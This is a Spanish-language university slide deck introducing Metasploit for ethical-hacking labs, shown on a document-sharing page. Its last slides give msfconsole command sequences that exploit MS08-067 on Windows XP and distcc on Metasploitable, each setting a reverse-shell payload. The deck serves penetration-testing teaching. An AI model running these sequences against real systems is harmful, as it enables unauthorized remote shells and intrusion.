Cristian Alejandro Rojas Quintero, profile picture
Subido porCristian Alejandro Rojas Quintero
PDF, PPTX1,161 vistas

Metasploit

Este documento proporciona una introducción a Metasploit, un framework de explotación de vulnerabilidades. Explica conceptos clave como exploits, payloads y shellcode, e introduce las interfaces de Metasploit como msfconsole y msfcli. También describe cómo interactuar con msfconsole para seleccionar módulos, configurar opciones y ejecutar exploits. Finalmente, presenta ejemplos de cómo explotar vulnerabilidades en sistemas Windows y Linux usando Metasploit.

Incrustar presentación

Descargar como PDF, PPTX
METASPLOIT Cristian Alejandro Rojas carojasq@correo.udistrital.edu.co Universidad Distrital Francisco José de Caldas
Etapas del hacking ético
Qué es un test de penetración? • Simulación de un ataque real • Obtener una autorizaciónpara hacer el ataque • Reportar al cliente los descubrimientos y recomendaciones • Encontrar y arreglar vulnerabilidadesantes de que un atacante real las pueda explotar
Objetivos en el laboratorio • Windows XP SP3 10.20……. • Ubuntu Linux 8.04Metasploitable 10.20……
Terminologia • Exploit: Vector para penetrar el sistema. • Payload: Es la “bomba” que estalla una vez está adentro del sistema. • Encoder: Codificadordel payload. • Shellcode: Un set de instrucciones usado como payload. • Listener: Escucha para una conexión entrante. • Session: Conexión de un exploit exitoso
METASPLOIT • Framework de explotación de vulnerabilidades • Basado en Ruby • Modular • Exploits, Payloads, Auxiliaries.
Interfaces • MSFconsole:Es la mas conocida, provee acceso a la gran mayoría de las opciones del framework. (Intecractiva).
Interfaces • MSFCli: Sirve para correr un ataque directamente desde la consola sin necesidad de ser interactivo.
Utilidades • MSFPayload:Es capaz de generar un ejecutable con el payload solamente.
Interactuando con msfconsole • use <module> - Configura el exploit a usar • set <x X> - Configura un parametro • setg <x X> - Define un parametro globalmente • show <x> - Muestra un <x> (exploits, payloads, options, etc) • help <x> - Muestra ayuda acerca de X • Info <module> muestra información acerca de un módulo • exploit – Ejecuta el módulo seleccionado.
Meterpreter • Payload • Nunca escribe en el disco, solo corre en memoria. • Provee comandos con funcionalidades adicionales: help, background,ps, migrate, getuid, download, upload,hashdump, shell. • Facilita escalamiento de privilegios (getsystem).
Metasploitable • Ubuntu 8.08 • Entorno para practicar explotación de vulnerabilidades • Vulnerabilidades de sistema operativo y también web.
Explotando una vulnerabilidad en Windows XP SP3 • Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft. search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 exploit
Explotando una vulnerabilidad en metasploitable (Linux) search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (ip local) exploit

Más contenido relacionado

PDF
Metasploit for Penetration Testing: Beginner Class
porGeorgia Weidman
 
PPTX
Metasploit
porInstitute of Information Security (IIS)
 
PPTX
Metasploit seminar
porhenelpj
 
PPTX
Build Node.js-WASM/WASI Tiny compiler with Node.js
pormganeko
 
PDF
Comprendre la securite web
porChristophe Villeneuve
 
PPTX
Open vas
porDipen Pau
 
PPTX
Nessus-Vulnerability Tester
porAditya Jain
 
PDF
Zabbix
porkamiloo2009
 
Metasploit for Penetration Testing: Beginner Class
porGeorgia Weidman
 
Metasploit
porInstitute of Information Security (IIS)
 
Metasploit seminar
porhenelpj
 
Build Node.js-WASM/WASI Tiny compiler with Node.js
pormganeko
 
Comprendre la securite web
porChristophe Villeneuve
 
Open vas
porDipen Pau
 
Nessus-Vulnerability Tester
porAditya Jain
 
Zabbix
porkamiloo2009
 

La actualidad más candente

PPTX
Metasploit
porLalith Sai
 
PPTX
Metasploit framwork
porDeepanshu Gajbhiye
 
PDF
Super Easy Memory Forensics
porIIJ
 
PPTX
BackDoors Seminar
porChaitali Patel
 
PPT
Operating system vulnerability and control
porأحلام انصارى
 
PPT
Développement Noyau Et Driver Sous Gnu Linux
porThierry Gayet
 
PPTX
VAPT - Vulnerability Assessment & Penetration Testing
porNetpluz Asia Pte Ltd
 
PPTX
Bypassing nac solutions and mitigations
porSuraj Khetani
 
PDF
Process injection - Malware style
porSander Demeester
 
PPTX
Introduction To Vulnerability Assessment & Penetration Testing
porRaghav Bisht
 
PPTX
Are You Ready for a Cloud Pentest?
por2nd Sight Lab
 
PDF
Secure coding-guidelines
porTrupti Shiralkar, CISSP
 
PDF
Presentation Zabbix en Français du 6 Juin 2013
porAlain Ganuchaud
 
PDF
CNIT 123 Ch 10: Hacking Web Servers
porSam Bowne
 
PPTX
Sandboxing
porLan & Wan Solutions
 
PPTX
Firewall Endian
porFouad Root
 
PDF
Sécurité informatique - Etat des menaces
porMaxime ALAY-EDDINE
 
PPT
Intrusion Detection Presentation
porMustafash79
 
PDF
Mini projet Zabbix
porSamiMessaoudi4
 
PPTX
EBIOS
porHouda Elmoutaoukil
 
Metasploit
porLalith Sai
 
Metasploit framwork
porDeepanshu Gajbhiye
 
Super Easy Memory Forensics
porIIJ
 
BackDoors Seminar
porChaitali Patel
 
Operating system vulnerability and control
porأحلام انصارى
 
Développement Noyau Et Driver Sous Gnu Linux
porThierry Gayet
 
VAPT - Vulnerability Assessment & Penetration Testing
porNetpluz Asia Pte Ltd
 
Bypassing nac solutions and mitigations
porSuraj Khetani
 
Process injection - Malware style
porSander Demeester
 
Introduction To Vulnerability Assessment & Penetration Testing
porRaghav Bisht
 
Are You Ready for a Cloud Pentest?
por2nd Sight Lab
 
Secure coding-guidelines
porTrupti Shiralkar, CISSP
 
Presentation Zabbix en Français du 6 Juin 2013
porAlain Ganuchaud
 
CNIT 123 Ch 10: Hacking Web Servers
porSam Bowne
 
Sandboxing
porLan & Wan Solutions
 
Firewall Endian
porFouad Root
 
Sécurité informatique - Etat des menaces
porMaxime ALAY-EDDINE
 
Intrusion Detection Presentation
porMustafash79
 
Mini projet Zabbix
porSamiMessaoudi4
 
EBIOS
porHouda Elmoutaoukil
 

Similar a Metasploit

PDF
Curso de Metasploit
porIgnacio Sorribas
 
PPTX
Ethical hacking 02
porTensor
 
PDF
Metasploit v0.5
porIgnacio Sorribas
 
PDF
Cpods training-metasploit
porsonia yamile ortega carrillo
 
PPTX
AMENAZAS EN LA RED- METAPLOIT.pptx
porHectorDeJesusTapiaGo
 
PPT
Pruebas de intrusion mediante Metasploit Framework
porErlaitzParreoMuoz
 
PPTX
Metasploit-La-Navaja-Suiza-del-Ethical-Hacking.pptx
porWellingtonAristega
 
PPTX
731066678-Tema-6-Post-Explotacion-Pentesting.pptx
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPTX
debeer sobre analisis de datos, empppppp
porWellingtonAristega
 
PDF
Metasploit
porJose Peña
 
PDF
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
PDF
Webinar Gratuito: Metasploit Framework
porAlonso Eduardo Caballero Quezada
 
PPTX
Metasploit Class: Shellshock Attack
porJulian Gonzalez
 
PPTX
Ethical hacking 01
porTensor
 
PDF
Webinar Gratuito: Metasploit Framework
porAlonso Eduardo Caballero Quezada
 
PDF
Episodio de pentesting
porakencito
 
PPTX
HerramientasExplotacion-GRUPO5.pptx
porJhoseC1
 
PDF
Sad tema2 pen_test_iii
porJesús Moreno León
 
PDF
Webinar Gratuito "Metasploit Framework"
porAlonso Eduardo Caballero Quezada
 
PDF
Network.Penetration.CGSOL
porykro
 
Curso de Metasploit
porIgnacio Sorribas
 
Ethical hacking 02
porTensor
 
Metasploit v0.5
porIgnacio Sorribas
 
Cpods training-metasploit
porsonia yamile ortega carrillo
 
AMENAZAS EN LA RED- METAPLOIT.pptx
porHectorDeJesusTapiaGo
 
Pruebas de intrusion mediante Metasploit Framework
porErlaitzParreoMuoz
 
Metasploit-La-Navaja-Suiza-del-Ethical-Hacking.pptx
porWellingtonAristega
 
731066678-Tema-6-Post-Explotacion-Pentesting.pptx
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
debeer sobre analisis de datos, empppppp
porWellingtonAristega
 
Metasploit
porJose Peña
 
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
Webinar Gratuito: Metasploit Framework
porAlonso Eduardo Caballero Quezada
 
Metasploit Class: Shellshock Attack
porJulian Gonzalez
 
Ethical hacking 01
porTensor
 
Webinar Gratuito: Metasploit Framework
porAlonso Eduardo Caballero Quezada
 
Episodio de pentesting
porakencito
 
HerramientasExplotacion-GRUPO5.pptx
porJhoseC1
 
Sad tema2 pen_test_iii
porJesús Moreno León
 
Webinar Gratuito "Metasploit Framework"
porAlonso Eduardo Caballero Quezada
 
Network.Penetration.CGSOL
porykro
 

Más de Cristian Alejandro Rojas Quintero

PPTX
Nmap
porCristian Alejandro Rojas Quintero
 
PDF
Lenguaje de programación Ruby
porCristian Alejandro Rojas Quintero
 
PDF
Tutorial freeradius + Mysql
porCristian Alejandro Rojas Quintero
 
PDF
Análisis de datos: R vs Python
porCristian Alejandro Rojas Quintero
 
PDF
Tipos de datos en R
porCristian Alejandro Rojas Quintero
 
ODP
High Performance Computing con Software libre
porCristian Alejandro Rojas Quintero
 
ODP
Hpc
porCristian Alejandro Rojas Quintero
 
PDF
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
porCristian Alejandro Rojas Quintero
 
Nmap
porCristian Alejandro Rojas Quintero
 
Lenguaje de programación Ruby
porCristian Alejandro Rojas Quintero
 
Tutorial freeradius + Mysql
porCristian Alejandro Rojas Quintero
 
Análisis de datos: R vs Python
porCristian Alejandro Rojas Quintero
 
Tipos de datos en R
porCristian Alejandro Rojas Quintero
 
High Performance Computing con Software libre
porCristian Alejandro Rojas Quintero
 
Hpc
porCristian Alejandro Rojas Quintero
 
Desarrollo e implentación de una plataforma bioinformática para el análisis R...
porCristian Alejandro Rojas Quintero
 

Metasploit

  • 1.
  • 2.
  • 3.
    Qué es untest de penetración? • Simulación de un ataque real • Obtener una autorizaciónpara hacer el ataque • Reportar al cliente los descubrimientos y recomendaciones • Encontrar y arreglar vulnerabilidadesantes de que un atacante real las pueda explotar
  • 4.
    Objetivos en ellaboratorio • Windows XP SP3 10.20……. • Ubuntu Linux 8.04Metasploitable 10.20……
  • 5.
    Terminologia • Exploit: Vectorpara penetrar el sistema. • Payload: Es la “bomba” que estalla una vez está adentro del sistema. • Encoder: Codificadordel payload. • Shellcode: Un set de instrucciones usado como payload. • Listener: Escucha para una conexión entrante. • Session: Conexión de un exploit exitoso
  • 6.
    METASPLOIT • Framework deexplotación de vulnerabilidades • Basado en Ruby • Modular • Exploits, Payloads, Auxiliaries.
  • 7.
    Interfaces • MSFconsole:Es lamas conocida, provee acceso a la gran mayoría de las opciones del framework. (Intecractiva).
  • 8.
    Interfaces • MSFCli: Sirvepara correr un ataque directamente desde la consola sin necesidad de ser interactivo.
  • 9.
    Utilidades • MSFPayload:Es capazde generar un ejecutable con el payload solamente.
  • 10.
    Interactuando con msfconsole •use <module> - Configura el exploit a usar • set <x X> - Configura un parametro • setg <x X> - Define un parametro globalmente • show <x> - Muestra un <x> (exploits, payloads, options, etc) • help <x> - Muestra ayuda acerca de X • Info <module> muestra información acerca de un módulo • exploit – Ejecuta el módulo seleccionado.
  • 11.
    Meterpreter • Payload • Nuncaescribe en el disco, solo corre en memoria. • Provee comandos con funcionalidades adicionales: help, background,ps, migrate, getuid, download, upload,hashdump, shell. • Facilita escalamiento de privilegios (getsystem).
  • 12.
    Metasploitable • Ubuntu 8.08 •Entorno para practicar explotación de vulnerabilidades • Vulnerabilidades de sistema operativo y también web.
  • 13.
    Explotando una vulnerabilidaden Windows XP SP3 • Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft. search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 exploit
  • 14.
    Explotando una vulnerabilidaden metasploitable (Linux) search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (ip local) exploit